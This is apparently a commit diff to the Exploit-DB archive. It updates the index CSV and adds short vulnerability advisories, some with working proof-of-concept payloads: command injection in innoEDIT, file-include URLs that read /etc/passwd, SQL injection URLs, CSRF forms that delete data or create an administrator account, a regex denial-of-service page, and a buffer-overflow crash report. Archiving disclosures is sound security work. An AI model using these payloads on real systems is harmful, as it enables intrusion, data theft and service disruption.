16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS",2011-03-10,zx2c4,linux,dos,0
16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0
@ -15326,7 +15326,7 @@ id,file,description,date,author,platform,type,port
17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0
17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager - test.html) Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0
17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux Version)",2011-08-10,SZ,linux,remote,0
@ -28571,18 +28571,18 @@ id,file,description,date,author,platform,type,port
31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution Vulnerability",2008-04-24,"Thomas Pollet",unix,remote,0
31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial Of Service Vulnerability",2008-04-24,"Luigi Auriemma",windows,dos,0
31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 - Component mosConfig_absolute_path Remote File Include Vulnerability",2008-04-26,NoGe,php,webapps,0
31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting and Local File Include Vulnerability",2008-04-26,IRCRASH,php,webapps,0
31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting and Local File Include Vulnerability",2008-04-26,"Khashayar Fereidani",php,webapps,0
31710,platforms/novell/dos/31710.txt,"Novell GroupWise 7.0 - HTML Injection and Denial of Service Vulnerabilities",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0
31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service Vulnerability",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0
31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,IRCRASH,php,webapps,0
31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,"Khashayar Fereidani",php,webapps,0
31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0
31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0
31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0
31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'username' Cross-Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0
31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting Vulnerability",2008-05-01,"Khashayar Fereidani",php,webapps,0
31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'username' Cross-Site Scripting Vulnerability",2008-05-01,"Khashayar Fereidani",php,webapps,0
31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0
31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0
31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0
31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - header.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0
31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter XSS",2008-05-02,"Khashayar Fereidani",php,webapps,0
31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - header.php Multiple Parameter XSS",2008-05-02,"Khashayar Fereidani",php,webapps,0
31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - info.php id Parameter SQL Injection",2008-05-02,hadihadi,php,webapps,0
31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - index.php year Parameter XSS",2008-05-02,hadihadi,php,webapps,0
31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - index.php keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0
@ -29027,7 +29027,7 @@ id,file,description,date,author,platform,type,port
32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery browsecats.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32179,platforms/php/webapps/32179.txt,"POWERGAP Shopsystem 's03.php' SQL Injection Vulnerability",2008-08-05,"Rohit Bansal",php,webapps,0
32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Include Vulnerabilities",2008-08-06,casper41,php,webapps,0
32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,IRCRASH,php,webapps,0
32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,"Khashayar Fereidani",php,webapps,0
32182,platforms/php/webapps/32182.txt,"phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0
32183,platforms/php/webapps/32183.txt,"phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0
32184,platforms/asp/webapps/32184.txt,"KAPhotoservice order.asp page Parameter XSS",2008-08-06,by_casper41,asp,webapps,0
@ -29086,7 +29086,7 @@ id,file,description,date,author,platform,type,port
32239,platforms/php/webapps/32239.txt,"Trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0
32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 Invalid URI Format String Vulnerability",2008-08-13,"Aaron Grattafiori",linux,dos,0
32249,platforms/jsp/webapps/32249.txt,"Openfire <= 3.5.2 - 'login.jsp' Cross-Site Scripting Vulnerability",2008-08-14,"Daniel Henninger",jsp,webapps,0
32250,platforms/php/webapps/32250.py,"mUnky 0.01'index.php' Remote Code Execution Vulnerability",2008-08-15,IRCRASH,php,webapps,0
32250,platforms/php/webapps/32250.py,"mUnky 0.01'index.php' Remote Code Execution Vulnerability",2008-08-15,"Khashayar Fereidani",php,webapps,0
32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Include Vulnerability",2008-08-15,Lostmon,php,webapps,0
32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 administrator/popups/index3pop.php mosConfig_sitename Parameter XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0
32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - mambots/editors/mostlyce/ php/connector.php Query String XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0
@ -29107,7 +29107,7 @@ id,file,description,date,author,platform,type,port
32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/loginbox.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/whos_online.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 templates/Freeway/mainpage_modules/mainpage.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 Cookie Data SQL Injection Vulnerability",2008-08-18,IRCRASH,php,webapps,0
32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 Cookie Data SQL Injection Vulnerability",2008-08-18,"Khashayar Fereidani",php,webapps,0
32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting Vulnerability",2008-08-18,"ThE dE@Th",php,webapps,0
32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80
32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 (article.php) - Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80
@ -31928,7 +31928,7 @@ id,file,description,date,author,platform,type,port
35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 - 'head.php' Cross-Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 - 'head.php' Cross-Site Scripting Vulnerability",2011-03-08,"Khashayar Fereidani",php,webapps,0
35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service Vulnerability",2011-03-01,"Buildbot Builder",linux,dos,0
35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - (.m3u) Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0
35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure Vulnerability",2011-03-09,"Aaron Sigel",windows,remote,0
@ -35358,6 +35358,7 @@ id,file,description,date,author,platform,type,port
39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0
39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0
@ -35368,3 +35369,12 @@ id,file,description,date,author,platform,type,port
39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store 'id' Parameter Multiple SQL Injection Vulnerabilities",2014-03-08,"Nawaf Alkeraithe",php,webapps,0
39114,platforms/ios/remote/39114.txt,"Apple iOS <= 4.2.1 'facetime-audio://' Security Bypass Vulnerability",2014-03-10,"Guillaume Ross",ios,remote,0
39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass Vulnerability",2014-03-09,IRH,multiple,remote,0
39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0
39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0
39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0
39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0
39127,platforms/cgi/webapps/39127.txt,"innoEDIT 'innoedit.cgi' Remote Command Execution Vulnerability",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
39128,platforms/php/webapps/39128.txt,"Jorjweb 'id' Parameter SQL Injection Vulnerability",2014-02-21,"Vulnerability Laboratory",php,webapps,0
39129,platforms/php/webapps/39129.txt,"qEngine 'run' Parameter Local File Include Vulnerability",2014-03-25,"Gjoko Krstic",php,webapps,0

Can't render this file because it is too large.

9
platforms/cgi/webapps/39127.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66367/info
innoEDIT is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
innoEDIT 6.2 is vulnerable; other versions may also be affected.
http://www.example.com/innoedit/innoedit.cgi?download=;id|

7
platforms/php/webapps/39116.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/66228/info
GNUboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/bbs/ajax.autosave.php?content=1&subject=1[SQLi]

46
platforms/php/webapps/39117.txt Executable file
View file

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/66251/info
OpenX is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
OpenX 2.8.11 and prior versions are vulnerable.
File: admin/agency-user-unlink.php
POC:
<img src='http://site/admin/agency-user-unlink.php?agencyid=1&userid=18' width="1" height="1" border="0">
File: admin/advertiser-delete.php
POC:
<img src='http://site/admin/advertiser-delete.php?clientid=10' width="1" height="1" border="0">
File: admin/banner-delete.php
POC:
<img
src='http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16'
width="1" height="1" border="0">
File: admin/campaign-delete.php
POC:
<img src='http://site/admin/campaign-delete.php?clientid=2&campaignid=11' width="1" height="1" border="0">
File: admin/channel-delete.php
POC:
<img
src='http://site/admin/channel-delete.php?affiliateid=1&channelid=6'
width="1" height="1" border="0">
File: admin/affiliate-delete.php
POC:
<img
src='http://site/admin/affiliate-delete.php?affiliateid=9' width="1" height="1"
border="0">
File: admin/zone-delete.php
POC:
<img
src='http://site/admin/zone-delete.php?affiliateid=1&zoneid=11'
width="1" height="1" border="0">

19
platforms/php/webapps/39118.html Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/66272/info
osCmax is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
<html>
<form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
<input type="hidden" name="admin_username" value="THETUNISIAN"/>
<input type="hidden" name="admin_firstname" value="Moot3x"/>
<input type="hidden" name="admin_lastname" value="Saad3x"/>
<input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>
<input type="hidden" name="admin_groups_id" value="1"/>
<!-- About "admin_groups_id" -->
<!-- 1= Top Administrator -->
<!-- 2= Customer Service -->
<input type='submit' name='Submit4' value="Agregar">
</form>
</html>

9
platforms/php/webapps/39124.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66317/info
MeiuPic is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
MeiuPic 2.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/MeiuPic/?ctl=../../../../../../../../../../etc/passwd

9
platforms/php/webapps/39126.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66350/info
BIGACE Web CMS is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, use directory-traversal strings to execute local script code in the context of the application, or obtain sensitive information that may aid in further attacks.
BIGACE Web CMS 2.7.5 is vulnerable; other versions may also be affected.
http://www.example.com/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI]

7
platforms/php/webapps/39128.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/66377/info
Jorjweb is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/ajedrez47/Paginas/info_torneo.php?id=3852'[REMOTE SQL-INJECTION WEB VULNERABILITY!]--

9
platforms/php/webapps/39129.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66401/info
qEngine is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input before being used to include files.
An attacker can exploit this issue using directory-traversal strings to view files and execute local script code in the context of the web server process. This may allow the attacker to compromise the application; other attacks are also possible.
qEngine 6.0.0 and 4.1.6 are vulnerable; other versions may also be affected.
http://www.example.com/qe6_0/admin/task.php?run=../../../../../../windows/win.ini

166
platforms/windows/dos/39103.txt Executable file
View file

@ -0,0 +1,166 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt
Vendor:
==============
M. Jean Fages
www.accessdiver.com
circa 1998-2006
Product:
=============================
AccessDiver V4.301 build 5888
AccessDiver is a security tester for Web pages. It has got a set of tools
which
will verify the robustness of you accounts and directories. You will know
if your
customers, your users and you can use safely your web site.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AccessDiver is vulnerable to multiple buffer overflows, two vectors are
described below.
1) buffer overflow @ 2073 bytes in URL field for Server / IP address and
will overwrite NSEH and SEH exception handlers.
EAX 00000000
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 0012EA08
EBP 0012EA28
ESI 00000000
EDI 00000000
EIP 52525252 <----------------- BOOM
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1272 Prec NEAR,53 Mask 1 1 0 0 1 0
2) Buffer overflow when loading a malicious "Exploit zone file" text file
containing 2080 bytes,
load text file from "Weak History" Menu choose Import "from File" choose
exploit text file and BOOM!
EAX 00000000
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 00000000
ESP 0018E940
EBP 0018E960
ESI 00000000
EDI 00000000
EIP 52525242 <----------------- KABOOM
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0
Windbg dump...
(2abc.2330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000
edi=00000000
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
52525252 ?? ???
Disclosure Timeline:
=====================================
Vendor Notification: NA
December 26, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

9
platforms/windows/dos/39125.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66343/info
Kaspersky Internet Security is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to exhaust available CPU and memory resources and make the affected application unresponsive, denying service to legitimate users.
Kaspersky Internet Security 14.0.0.4651 is vulnerable; other versions may also be affected.
<HTML> <HEAD> <TITLE>RegExp Resource Exhaustion </TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF"> <SCRIPT type="text/javascript"> var patt1=new RegExp("(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+)"); document.write(patt1.exec("peace")); </SCRIPT> </BODY> </HTML>